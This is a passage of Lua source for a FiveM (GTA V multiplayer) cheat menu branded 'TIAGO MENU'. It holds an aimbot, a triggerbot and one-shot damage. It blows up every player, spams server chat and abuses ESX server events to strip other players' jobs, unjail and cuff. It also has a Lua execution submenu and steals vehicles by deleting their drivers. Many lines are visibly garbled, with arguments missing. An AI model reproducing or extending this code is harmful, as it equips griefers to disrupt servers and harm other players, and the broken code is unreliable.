- AddExplosion(coords.x, coords.y, coords.z, 2, 100000.0, true, false, 0)
- end
- end
- if TriggerBot then
- local Aiming, Entity = GetEntityPlayerIsFreeAimingAt(PlayerId(), Entity)
- if Aiming then
- if IsEntityAPed(Entity) and not IsPedDeadOrDying(Entity, 0) and IsPedAPlayer(Entity) then
- ShootPlayer(Entity)
- end
- end
- end
- if Oneshot then
- SetPlayerWeaponDamageModifier(PlayerId(), 100.0)
- local gotEntity = getEntity(PlayerId())
- if IsEntityAPed(gotEntity) then
- if IsPedInAnyVehicle(gotEntity, true) then
- if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
- if IsControlJustReleased(1, 69) then
- NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
- end
- else
- if IsControlJustReleased(1, 142) then
- NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
- end
- end
- end
- elseif IsEntityAVehicle(gotEntity) then
- if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
- if IsControlJustReleased(1, 69) then
- NetworkExplodeVehicle(gotEntity, true, true, 0)
- end
- else
- if IsControlJustReleased(1, 142) then
- NetworkExplodeVehicle(gotEntity, true, true, 0)
- end
- end
- end
- else
- SetPlayerWeaponDamageModifier(PlayerId(), 1.0)
- end
- if AimBot then
- SetPlayerWeaponDamageModifier(PlayerId(), 100.0)
- local gotEntity = getEntity(PlayerId())
- if IsEntityAPed(gotEntity) then
- if IsPedInAnyVehicle(gotEntity, true) then
- if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
- if IsControlJustReleased(1, 69) then
- NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
- end
- else
- if IsControlJustReleased(1, 142) then
- NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
- end
- end
- end
- elseif IsEntityAVehicle(gotEntity) then
- if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
- if IsControlJustReleased(1, 69) then
- NetworkExplodeVehicle(gotEntity, true, true, 0)
- end
- else
- if IsControlJustReleased(1, 142) then
- NetworkExplodeVehicle(gotEntity, true, true, 0)
- end
- end
- end
- else
- SetPlayerWeaponDamageModifier(PlayerId(), 1.0)
- end
- if blowall then
- for i = 0, 64 do
- AddExplosion(GetEntityCoords(GetPlayerPed(i)), 2, 100000.0, true, false, 100000.0)
- end
- end
- if spam then
- for i = 0, 128 do
- TriggerServerEvent(
- '_chat:messageEntered',
- {0, 0x99, 255},
- )
- TriggerServerEvent('_chat:messageEntered', 'FUCK SERVER by TIAGO MODZ#5836', {0, 0x99, 255}, 'FUCK SERVER by TIAGO MODZ#5836')
- end
- end
- DisplayRadar(true)
- if RainbowVeh then
- local ra = RGBRainbow(1.0)
- SetVehicleCustomPrimaryColour(GetVehiclePedIsUsing(PlayerPedId()), ra.r, ra.g, ra.b)
- SetVehicleCustomSecondaryColour(GetVehiclePedIsUsing(PlayerPedId()), ra.r, ra.g, ra.b)
- end
- if Noclip then
- local currentSpeed = 2
- local noclipEntity =
- IsPedInAnyVehicle(PlayerPedId(), false) and GetVehiclePedIsUsing(PlayerPedId()) or PlayerPedId()
- FreezeEntityPosition(PlayerPedId(), true)
- SetEntityInvincible(PlayerPedId(), true)
- local newPos = GetEntityCoords(entity)
- DisableControlAction(0, 32, true) --MoveUpOnly
- DisableControlAction(0, 268, true) --MoveUp
- DisableControlAction(0, 31, true) --MoveUpDown
- DisableControlAction(0, 269, true) --MoveDown
- DisableControlAction(0, 33, true) --MoveDownOnly
- DisableControlAction(0, 266, true) --MoveLeft
- DisableControlAction(0, 34, true) --MoveLeftOnly
- DisableControlAction(0, 30, true) --MoveLeftRight
- DisableControlAction(0, 267, true) --MoveRight
- DisableControlAction(0, 35, true) --MoveRightOnly
- DisableControlAction(0, 44, true) --Cover
- DisableControlAction(0, 20, true) --MultiplayerInfo
- local yoff = 0.0
- local zoff = 0.0
- if GetInputMode() == "MouseAndKeyboard" then
- if IsDisabledControlPressed(0, 32) then
- yoff = 0.5
- end
- if IsDisabledControlPressed(0, 33) then
- yoff = -0.5
- end
- if IsDisabledControlPressed(0, 34) then
- SetEntityHeading(PlayerPedId(), GetEntityHeading(PlayerPedId()) + 3.0)
- end
- if IsDisabledControlPressed(0, 35) then
- SetEntityHeading(PlayerPedId(), GetEntityHeading(PlayerPedId()) - 3.0)
- end
- if IsDisabledControlPressed(0, 44) then
- zoff = 0.21
- end
- if IsDisabledControlPressed(0, 20) then
- zoff = -0.21
- end
- end
- newPos =
- GetOffsetFromEntityInWorldCoords(noclipEntity, 0.0, yoff * (currentSpeed + 0.3), zoff * (currentSpeed + 0.3))
- local heading = GetEntityHeading(noclipEntity)
- SetEntityVelocity(noclipEntity, 0.0, 0.0, 0.0)
- SetEntityRotation(noclipEntity, 0.0, 0.0, 0.0, 0, false)
- SetEntityHeading(noclipEntity, heading)
- SetEntityCollision(noclipEntity, false, false)
- SetEntityCoordsNoOffset(noclipEntity, newPos.x, newPos.y, newPos.z, true, true, true)
- FreezeEntityPosition(noclipEntity, false)
- SetEntityInvincible(noclipEntity, false)
- SetEntityCollision(noclipEntity, true, true)
- end
- end
- end
- )
- function GetPlayers()
- local players = {}
- for i = 0, 31 do
- if NetworkIsPlayerActive(i) then
- table.insert(players, i)
- end
- end
- return players
- end
- function FirePlayer(SelectedPlayer)
- if ESX then
- ESX.TriggerServerCallback('esx_society:getOnlinePlayers', function(players)
- local playerMatch = nil
- for i=1, #players, 1 do
- label = players[i].name
- value = players[i].source
- name = players[i].name
- if name == GetPlayerName(SelectedPlayer) then
- playerMatch = players[i].identifier
- debugLog('found ' .. players[i].name .. ' ' .. players[i].identifier)
- end
- identifier = players[i].identifier
- end
- ESX.TriggerServerCallback('esx_society:setJob', function()
- end, playerMatch, 'unemployed', 0, 'hire')
- end)
- end
- end
- Citizen.CreateThread(
- function()
- FreezeEntityPosition(entity, false)
- local currentItemIndex = 1
- local selectedItemIndex = 1
- TiagoMenu.CreateMenu("MainMenu", "∑ TIAGO ~n~~r~MENU ∑")
- TiagoMenu.SetSubTitle("MainMenu", "VERSION 3.6")
- TiagoMenu.CreateSubMenu("Models", "MainMenu", "Model")
- TiagoMenu.CreateSubMenu("SelfMenu", "MainMenu", "PlayerMenu")
- TiagoMenu.CreateSubMenu("World", "MainMenu", "World")
- TiagoMenu.CreateSubMenu("Fuck", "MainMenu", "Fuck")
- TiagoMenu.CreateSubMenu("VehMenu", "MainMenu", "Vehicle Menu")
- TiagoMenu.CreateSubMenu("ServerMenu", "MainMenu", "LUA Execution")
- TiagoMenu.CreateSubMenu("TeleportMenu", "MainMenu", "Teleport Menu")
- TiagoMenu.CreateSubMenu('OnlinePlayerMenu', 'MainMenu', 'Online Player Menu')
- TiagoMenu.CreateSubMenu('PlayerOptionsMenu', 'OnlinePlayerMenu', 'Player Options')
- TiagoMenu.CreateSubMenu('SingleWepPlayer', 'OnlinePlayerMenu', 'Single Weapon Menu')
- TiagoMenu.CreateSubMenu("WepMenu", "MainMenu", "Weapon Menu")
- TiagoMenu.CreateSubMenu("SingleWepMenu", "WepMenu", "Single Weapon Menu")
- TiagoMenu.CreateSubMenu("ESXBoss", "ServerMenu", "ESX Boss Menus")
- TiagoMenu.CreateSubMenu("ESXMoney", "ServerMenu", "Money Options")
- TiagoMenu.CreateSubMenu("ESXMisc", "ServerMenu", "ESX Misc Options")
- TiagoMenu.CreateSubMenu("ESXDrugs", "ServerMenu", "ESX Drugs")
- TiagoMenu.CreateSubMenu("MiscServerOptions", "ServerMenu", "Misc Server Options")
- TiagoMenu.CreateSubMenu("RecrutarPlayers", "ServerMenu", "Recrutar Players")
- TiagoMenu.CreateSubMenu("RecrutarPlayersOptions", "RecrutarPlayers", "Recrutar Players options")
- TiagoMenu.CreateSubMenu("RecrutarPlayersOptions", "RecrutarPlayers", "Recrutar Players options")
- TiagoMenu.CreateSubMenu(
- 'WeaponTypes',
- 'WepMenu',
- 'Weapons'
- )
- TiagoMenu.CreateSubMenu(
- 'WeaponTypeSelection',
- 'WeaponTypes',
- 'Weapon'
- )
- TiagoMenu.CreateSubMenu(
- 'WeaponOptions',
- 'WeaponTypeSelection',
- 'Weapon Options'
- )
- TiagoMenu.CreateSubMenu('ModSelect', 'WeaponOptions', 'Weapon Mod Options')
- TiagoMenu.CreateSubMenu('CarTypes', 'VehMenu', 'Vehicles')
- TiagoMenu.CreateSubMenu('VehBoostMenu', 'VehMenu', 'Vehicle Boost')
- TiagoMenu.CreateSubMenu('CarTypeSelection', 'CarTypes', 'Types')
- TiagoMenu.CreateSubMenu(
- 'CarOptions',
- 'CarTypeSelection',
- 'Car Options'
- )
- TiagoMenu.CreateSubMenu('LSC', 'VehMenu', 'LSC Customs')
- TiagoMenu.CreateSubMenu('tunings', 'LSC', 'Visual Tuning')
- TiagoMenu.CreateSubMenu('performance', 'LSC', 'Performance Tuning')
- for i, da in pairs(be) do
- TiagoMenu.CreateSubMenu(, 'tunings',
- if == 'paint' then
- TiagoMenu.CreateSubMenu('primary',, 'Primary Paint')
- TiagoMenu.CreateSubMenu('secondary',, 'Secondary Paint')
- TiagoMenu.CreateSubMenu('rimpaint',, 'Wheel Paint')
- TiagoMenu.CreateSubMenu('classic1', 'primary', 'Classic Paint')
- TiagoMenu.CreateSubMenu('metallic1', 'primary', 'Metallic Paint')
- TiagoMenu.CreateSubMenu('matte1', 'primary', 'Matte Paint')
- TiagoMenu.CreateSubMenu('metal1', 'primary', 'Metal Paint')
- TiagoMenu.CreateSubMenu('classic2', 'secondary', 'Classic Paint')
- TiagoMenu.CreateSubMenu('metallic2', 'secondary', 'Metallic Paint')
- TiagoMenu.CreateSubMenu('matte2', 'secondary', 'Matte Paint')
- TiagoMenu.CreateSubMenu('metal2', 'secondary', 'Metal Paint')
- TiagoMenu.CreateSubMenu('classic3', 'rimpaint', 'Classic Paint')
- TiagoMenu.CreateSubMenu('metallic3', 'rimpaint', 'Metallic Paint')
- TiagoMenu.CreateSubMenu('matte3', 'rimpaint', 'Matte Paint')
- TiagoMenu.CreateSubMenu('metal3', 'rimpaint', 'Metal Paint')
- end
- end
- for i, da in pairs(bf) do
- TiagoMenu.CreateSubMenu(, 'performance',
- end
- local SelectedPlayer
- while bm do
- ped = PlayerPedId()
- veh = GetVehiclePedIsUsing(ped)
- SetVehicleModKit(veh, 0)
- for i, da in pairs(be) do
- if TiagoMenu.IsMenuOpened('tunings') then
- if b9 then
- if bb == 'neon' then
- local r, g, b = table.unpack(ba)
- SetVehicleNeonLightsColour(veh, r, g, b)
- SetVehicleNeonLightEnabled(veh, 0, bd)
- SetVehicleNeonLightEnabled(veh, 1, bd)
- SetVehicleNeonLightEnabled(veh, 2, bd)
- SetVehicleNeonLightEnabled(veh, 3, bd)
- b9 = false
- bb = -1
- ba = -1
- elseif bb == 'paint' then
- local db, dc, dd, de = table.unpack(ba)
- SetVehicleColours(veh, db, dc)
- SetVehicleExtraColours(veh, dd, de)
- b9 = false
- bb = -1
- ba = -1
- else
- if bd == 'rm' then
- RemoveVehicleMod(veh, bb)
- b9 = false
- bb = -1
- ba = -1
- else
- SetVehicleMod(veh, bb, ba, false)
- b9 = false
- bb = -1
- ba = -1
- end
- end
- end
- end
- if TiagoMenu.IsMenuOpened( then
- if == 'wheeltypes' then
- if TiagoMenu.Button('Sport Wheels') then
- SetVehicleWheelType(veh, 0)
- elseif TiagoMenu.Button('Muscle Wheels') then
- SetVehicleWheelType(veh, 1)
- elseif TiagoMenu.Button('Lowrider Wheels') then
- SetVehicleWheelType(veh, 2)
- elseif TiagoMenu.Button('SUV Wheels') then
- SetVehicleWheelType(veh, 3)
- elseif TiagoMenu.Button('Offroad Wheels') then
- SetVehicleWheelType(veh, 4)
- elseif TiagoMenu.Button('Tuner Wheels') then
- SetVehicleWheelType(veh, 5)
- elseif TiagoMenu.Button('High End Wheels') then
- SetVehicleWheelType(veh, 7)
- end
- TiagoMenu.Display()
- elseif == 'extra' then
- local df = checkValidVehicleExtras()
- for i, da in pairs(df) do
- if IsVehicleExtraTurnedOn(veh, i) then
- pricestring = 'Installed'
- else
- pricestring = 'Not Installed'
- end
- if TiagoMenu.Button(da.menuName, pricestring) then
- SetVehicleExtra(veh, i, IsVehicleExtraTurnedOn(veh, i))
- end
- end
- TiagoMenu.Display()
- elseif == 'neon' then
- if TiagoMenu.Button('None') then
- SetVehicleNeonLightsColour(veh, 255, 255, 255)
- SetVehicleNeonLightEnabled(veh, 0, false)
- SetVehicleNeonLightEnabled(veh, 1, false)
- SetVehicleNeonLightEnabled(veh, 2, false)
- SetVehicleNeonLightEnabled(veh, 3, false)
- end
- for i, da in pairs(bg) do
- colorr, colorg, colorb = table.unpack(da)
- r, g, b = GetVehicleNeonLightsColour(veh)
- if
- colorr == r and colorg == g and colorb == b and IsVehicleNeonLightEnabled(vehicle, 2) and
- not b9
- then
- pricestring = 'Installed'
- else
- if b9 and colorr == r and colorg == g and colorb == b then
- pricestring = 'Previewing'
- else
- pricestring = 'Not Installed'
- end
- end
- if TiagoMenu.Button(i, pricestring) then
- if not b9 then
- bb = 'neon'
- bd = IsVehicleNeonLightEnabled(veh, 1)
- oldr, oldg, oldb = GetVehicleNeonLightsColour(veh)
- ba = table.pack(oldr, oldg, oldb)
- SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
- SetVehicleNeonLightEnabled(veh, 0, true)
- SetVehicleNeonLightEnabled(veh, 1, true)
- SetVehicleNeonLightEnabled(veh, 2, true)
- SetVehicleNeonLightEnabled(veh, 3, true)
- b9 = true
- elseif b9 and colorr == r and colorg == g and colorb == b then
- SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
- SetVehicleNeonLightEnabled(veh, 0, true)
- SetVehicleNeonLightEnabled(veh, 1, true)
- SetVehicleNeonLightEnabled(veh, 2, true)
- SetVehicleNeonLightEnabled(veh, 3, true)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and colorr ~= r or colorg ~= g or colorb ~= b then
- SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
- SetVehicleNeonLightEnabled(veh, 0, true)
- SetVehicleNeonLightEnabled(veh, 1, true)
- SetVehicleNeonLightEnabled(veh, 2, true)
- SetVehicleNeonLightEnabled(veh, 3, true)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif == 'paint' then
- if TiagoMenu.MenuButton('~h~~p~-> ~s~Primary Paint', 'primary') then
- elseif TiagoMenu.MenuButton('~h~~p~-> ~s~Secondary Paint', 'secondary') then
- elseif TiagoMenu.MenuButton('~h~~p~-> ~s~Wheel Paint', 'rimpaint') then
- end
- TiagoMenu.Display()
- else
- local at = checkValidVehicleMods(
- for dg, dh in pairs(at) do
- if dh.menuName == '~h~~b~Stock' then
- price = 0
- end
- if == 'Horns' then
- for di, dj in pairs(horns) do
- if dj == dg - 1 then
- dh.menuName = di
- end
- end
- end
- if dh.menuName == 'NULL' then
- dh.menuname = 'unknown'
- end
- if TiagoMenu.Button(dh.menuName, price) then
- if not b9 then
- bb =
- ba = GetVehicleMod(veh,
- b9 = true
- if == -1 then
- bd = 'rm'
- RemoveVehicleMod(veh,
- b9 = false
- bb = -1
- ba = -1
- bd = false
- else
- bd = false
- SetVehicleMod(veh,,, false)
- end
- elseif b9 and GetVehicleMod(veh, == then
- b9 = false
- bb = -1
- ba = -1
- bd = false
- if == -1 then
- RemoveVehicleMod(veh,
- else
- SetVehicleMod(veh,,, false)
- end
- elseif b9 and GetVehicleMod(veh, ~= then
- if == -1 then
- RemoveVehicleMod(veh,
- b9 = false
- bb = -1
- ba = -1
- bd = false
- else
- SetVehicleMod(veh,,, false)
- b9 = true
- end
- end
- end
- end
- TiagoMenu.Display()
- end
- end
- end
- for i, da in pairs(bf) do
- if TiagoMenu.IsMenuOpened( then
- if GetVehicleMod(veh, == 0 then
- pricestock = 'Not Installed'
- price1 = 'Installed'
- price2 = 'Not Installed'
- price3 = 'Not Installed'
- price4 = 'Not Installed'
- elseif GetVehicleMod(veh, == 1 then
- pricestock = 'Not Installed'
- price1 = 'Not Installed'
- price2 = 'Installed'
- price3 = 'Not Installed'
- price4 = 'Not Installed'
- elseif GetVehicleMod(veh, == 2 then
- pricestock = 'Not Installed'
- price1 = 'Not Installed'
- price2 = 'Not Installed'
- price3 = 'Installed'
- price4 = 'Not Installed'
- elseif GetVehicleMod(veh, == 3 then
- pricestock = 'Not Installed'
- price1 = 'Not Installed'
- price2 = 'Not Installed'
- price3 = 'Not Installed'
- price4 = 'Installed'
- elseif GetVehicleMod(veh, == -1 then
- pricestock = 'Installed'
- price1 = 'Not Installed'
- price2 = 'Not Installed'
- price3 = 'Not Installed'
- price4 = 'Not Installed'
- end
- if TiagoMenu.Button('Stock ' .., pricestock) then
- SetVehicleMod(veh,, -1)
- elseif TiagoMenu.Button( .. ' Upgrade 1', price1) then
- SetVehicleMod(veh,, 0)
- elseif TiagoMenu.Button( .. ' Upgrade 2', price2) then
- SetVehicleMod(veh,, 1)
- elseif TiagoMenu.Button( .. ' Upgrade 3', price3) then
- SetVehicleMod(veh,, 2)
- elseif ~= 13 and ~= 12 and TiagoMenu.Button( .. ' Upgrade 4', price4) then
- SetVehicleMod(veh,, 3)
- end
- TiagoMenu.Display()
- end
- end
- if TiagoMenu.IsMenuOpened("MainMenu") then
- drawNotification("~h~WELCOM ~r~[~s~ " ..GetPlayerName(PlayerId()).." ~r~]")
- drawNotification("~h~Key ~h~~g~[ 1 ] ~s~Teleport Waypoint")
- drawNotification("~h~Key ~h~~g~[ 2 ] ~s~Fix Car")
- drawNotification("~h~~g~Official Discord: ~s~~n~~h~ ~n~~r~TiagoModz#5836")
- if TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Online ~s~Players ~h~~r~←", "OnlinePlayerMenu") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Player ~s~Menu ~h~~r~←", "SelfMenu") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Models ~s~Menu ~h~~r~←", "Models") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~World ~s~Menu ~h~~r~←", "World") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Teleporte ~s~Menu ~h~~r~←", "TeleportMenu") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Vehicles ~s~Menu ~h~~r~←", "VehMenu") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Weapons ~s~Menu ~h~~r~←", "WepMenu") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Fuck ~s~Server ~h~~r~←", "Fuck") then
- elseif TiagoMenu.MenuButton("~h~~r~→ ~g~∑ <FONT COLOR='#15f600'>LUA MENU ~g~∑ ~h~~r~←", "ServerMenu") then
- elseif TiagoMenu.Button("X ~r~DISCONNECT ~s~X") then
- bm = false
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("SelfMenu") then
- if
- TiagoMenu.CheckBox(
- "~h~~g~God ~h~~r~Mode ~s~1",
- Godmode,
- function(enabled)
- Godmode = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~g~God ~h~~r~Mode ~s~2",
- ToggleGodmode,
- function(enabled)
- ToggleGodmode = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~g~God ~h~~r~Mode ~s~3",
- Demigod,
- function(enabled)
- Demigod = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~b~Forcefield ~r~(~s~Turn on Godmode~r~)",
- Forcefield,
- function(enabled)
- Forcefield = enabled
- end)
- then
- elseif TiagoMenu.ComboBox("Radius ~b~Distance", ForcefieldRadiusOps, currForcefieldRadiusIndex, selForcefieldRadiusIndex, function(currentIndex, selectedIndex)
- currForcefieldRadiusIndex = currentIndex
- selForcefieldRadiusIndex = currentIndex
- ForcefieldRadius = ForcefieldRadiusOps[currentIndex]
- end) then
- elseif TiagoMenu.Button("~h~~r~Suicide") then
- SetEntityHealth(PlayerPedId(), 0)
- elseif TiagoMenu.Button("~h~~g~Revive") then
- TriggerEvent("esx_ambulancejob:revive")
- TriggerEvent('ambulancier:selfRespawn')
- elseif TiagoMenu.Button("~g~Heal") then
- SetEntityHealth(PlayerPedId(), 200)
- elseif TiagoMenu.Button("~h~~b~Armour") then
- SetPedArmour(PlayerPedId(), 200)
- elseif TiagoMenu.Button("~o~~h~Set hunger to ~s~100%") then
- TriggerEvent("esx_status:set", "hunger", 1000000)
- elseif TiagoMenu.Button("~b~~h~Set thirst to ~s~100%") then
- TriggerEvent("esx_status:set", "thirst", 1000000)
- elseif TiagoMenu.Button("~h~Open Menu Jail ~g~ESX") then
- TriggerEvent("esx-qalle-jail:openJailMenu")
- elseif TiagoMenu.Button("~h~~b~Unjail") then
- TriggerServerEvent('esx_jailer:unjailTime', -1)
- TriggerServerEvent('JailUpdate', 0)
- TriggerEvent('UnJP')
- elseif TiagoMenu.Button("~b~Cuff ~s~Player") then
- TriggerServerEvent("OG_cuffs:cuffCheckNearest")
- TriggerServerEvent("CheckHandcuff")
- TriggerServerEvent('cuffServer')
- TriggerServerEvent("cuffGranted")
- TriggerServerEvent("police:cuffGranted")
- TriggerServerEvent('esx_handcuffs:cuffing')
- TriggerServerEvent('esx_policejob:handcuff')
- elseif
- TiagoMenu.CheckBox("~h~Infinite Stamina",InfStamina,function(enabled)InfStamina = enabled end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Super Jump",
- SuperJump,
- function(enabled)
- SuperJump = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Explosive Punch",
- ePunch,
- function(enabled)
- ePunch = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox("~h~Fast Run",fastrun,function(enabled)fastrun = enabled end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Invisible",
- Invisible,
- function(enabled)
- Invisible = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox("~h~NoClip",Noclip,function(enabled)Noclip = enabled end)
- then
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("TeleportMenu") then
- if TiagoMenu.Button("~h~Teleport ~h~~p~Waypoint ~r~(F5)") then
- TeleportToWaypoint()
- elseif TiagoMenu.Button("~h~Teleport intro ~h~~p~Vehicle ") then
- local playerPed = GetPlayerPed(-1)
- local playerPedPos = GetEntityCoords(playerPed, true)
- local NearestVehicle = GetClosestVehicle(GetEntityCoords(playerPed, true), 1000.0, 0, 4)
- local NearestVehiclePos = GetEntityCoords(NearestVehicle, true)
- local NearestPlane = GetClosestVehicle(GetEntityCoords(playerPed, true), 1000.0, 0, 16384)
- local NearestPlanePos = GetEntityCoords(NearestPlane, true)
- Citizen.Wait(1000)
- if (NearestVehicle == 0) and (NearestPlane == 0) then
- drawNotification("~r~No Vehicle Found")
- elseif (NearestVehicle == 0) and (NearestPlane ~= 0) then
- if IsVehicleSeatFree(NearestPlane, -1) then
- SetPedIntoVehicle(playerPed, NearestPlane, -1)
- SetVehicleAlarm(NearestPlane, false)
- SetVehicleDoorsLocked(NearestPlane, 1)
- SetVehicleNeedsToBeHotwired(NearestPlane, false)
- else
- local driverPed = GetPedInVehicleSeat(NearestPlane, -1)
- ClearPedTasksImmediately(driverPed)
- SetEntityAsMissionEntity(driverPed, 1, 1)
- DeleteEntity(driverPed)
- SetPedIntoVehicle(playerPed, NearestPlane, -1)
- SetVehicleAlarm(NearestPlane, false)
- SetVehicleDoorsLocked(NearestPlane, 1)
- SetVehicleNeedsToBeHotwired(NearestPlane, false)
- end
- drawNotification("~g~Teleported Into Vehicle")
- elseif (NearestVehicle ~= 0) and (NearestPlane == 0) then
- if IsVehicleSeatFree(NearestVehicle, -1) then
- SetPedIntoVehicle(playerPed, NearestVehicle, -1)
- SetVehicleAlarm(NearestVehicle, false)
- SetVehicleDoorsLocked(NearestVehicle, 1)
- SetVehicleNeedsToBeHotwired(NearestVehicle, false)
- else
- local driverPed = GetPedInVehicleSeat(NearestVehicle, -1)
- ClearPedTasksImmediately(driverPed)
- SetEntityAsMissionEntity(driverPed, 1, 1)
- DeleteEntity(driverPed)
- SetPedIntoVehicle(playerPed, NearestVehicle, -1)
- SetVehicleAlarm(NearestVehicle, false)
- SetVehicleDoorsLocked(NearestVehicle, 1)
- SetVehicleNeedsToBeHotwired(NearestVehicle, false)
- end
- drawNotification("~g~Teleported Into Vehicle")
- elseif (NearestVehicle ~= 0) and (NearestPlane ~= 0) then
- if Vdist(NearestVehiclePos.x, NearestVehiclePos.y, NearestVehiclePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) < Vdist(NearestPlanePos.x, NearestPlanePos.y, NearestPlanePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) then
- if IsVehicleSeatFree(NearestVehicle, -1) then
- SetPedIntoVehicle(playerPed, NearestVehicle, -1)
- SetVehicleAlarm(NearestVehicle, false)
- SetVehicleDoorsLocked(NearestVehicle, 1)
- SetVehicleNeedsToBeHotwired(NearestVehicle, false)
- else
- local driverPed = GetPedInVehicleSeat(NearestVehicle, -1)
- ClearPedTasksImmediately(driverPed)
- SetEntityAsMissionEntity(driverPed, 1, 1)
- DeleteEntity(driverPed)
- SetPedIntoVehicle(playerPed, NearestVehicle, -1)
- SetVehicleAlarm(NearestVehicle, false)
- SetVehicleDoorsLocked(NearestVehicle, 1)
- SetVehicleNeedsToBeHotwired(NearestVehicle, false)
- end
- elseif Vdist(NearestVehiclePos.x, NearestVehiclePos.y, NearestVehiclePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) > Vdist(NearestPlanePos.x, NearestPlanePos.y, NearestPlanePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) then
- if IsVehicleSeatFree(NearestPlane, -1) then
- SetPedIntoVehicle(playerPed, NearestPlane, -1)
- SetVehicleAlarm(NearestPlane, false)
- SetVehicleDoorsLocked(NearestPlane, 1)
- SetVehicleNeedsToBeHotwired(NearestPlane, false)
- else
- local driverPed = GetPedInVehicleSeat(NearestPlane, -1)
- ClearPedTasksImmediately(driverPed)
- SetEntityAsMissionEntity(driverPed, 1, 1)
- DeleteEntity(driverPed)
- SetPedIntoVehicle(playerPed, NearestPlane, -1)
- SetVehicleAlarm(NearestPlane, false)
- SetVehicleDoorsLocked(NearestPlane, 1)
- SetVehicleNeedsToBeHotwired(NearestPlane, false)
- end
- end
- drawNotification("~g~Teleported Into Vehicle")
- end
- elseif TiagoMenu.Button("~h~Teleport ~p~To Coords") then
- TeleportToCoords()
- elseif TiagoMenu.Button("~h~Teleport ~h~~g~LSPD ") then
- LSPD()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~FBI') then
- fbi()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~LS Customs') then
- ls()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~GP') then
- gp()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Ammunation') then
- Ammunation()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Clothes shop') then
- shopclothes()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Barber') then
- barber()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Maze Bank') then
- MazeBank()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Spot') then
- spot()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Michael House') then
- MichaelHouse()
- elseif TiagoMenu.Button('~h~Teleport ~h~~g~Trevor Trailer') then
- trevor()
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("World") then
- if
- TiagoMenu.CheckBox(
- "~h~ESP",
- esp,
- function(enabled)
- esp = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Collision vehicles",
- Collision,
- function(enabled)
- Collision = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Force MiniMap",
- ForceMap,
- function(enabled)
- ForceMap = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Players Blips Map",
- playerBlips,
- function(enabled)
- playerBlips = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~~r~Crosshair",
- crosshair,
- function(enabled)
- crosshair = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~~r~Crosshair 2",
- crosshair2,
- function(enabled)
- crosshair2 = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~~r~Crosshair 3",
- crosshair3,
- function(enabled)
- crosshair3 = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~~o~Thermal Vision",
- thermalVision,
- function(enabled)
- thermalVision = enabled
- SetSeethrough(thermalVision)
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~p~Night Vision",
- nightVision,
- function(enabled)
- nightVision = enabled
- SetNightvision(nightVision)
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~Christmas Weather",
- function(enabled)
- XMAS = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~o~Foggy Weather",
- function(enabled)
- FOGGY = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~Clear Weather",
- function(enabled)
- CLEAR = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~g~Blizzard Weather",
- function(enabled)
- BLIZZARD = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~y~Extra Sunny Weather",
- function(enabled)
- EXTRASUNNY = enabled
- end)
- then
- elseif TiagoMenu.Button("Time set to night") then
- NetworkOverrideClockTime(23, 50, 0)
- elseif TiagoMenu.Button("Time set to day") then
- NetworkOverrideClockTime(12, 12, 0)
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("Fuck") then
